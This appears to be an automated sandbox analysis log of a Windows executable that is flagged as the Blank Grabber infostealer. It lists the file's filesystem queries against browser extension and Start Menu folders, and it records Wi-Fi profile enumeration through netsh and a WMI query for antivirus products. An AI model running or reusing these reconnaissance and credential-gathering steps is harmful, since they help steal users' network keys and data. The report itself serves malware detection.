              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA5D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF78DA5D080
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: 0_2_00007FF78DA75EEC _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF78DA75EEC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,70_2_00007FF6AA1C48CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Uses netsh to modify the Windows network and firewall settings
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
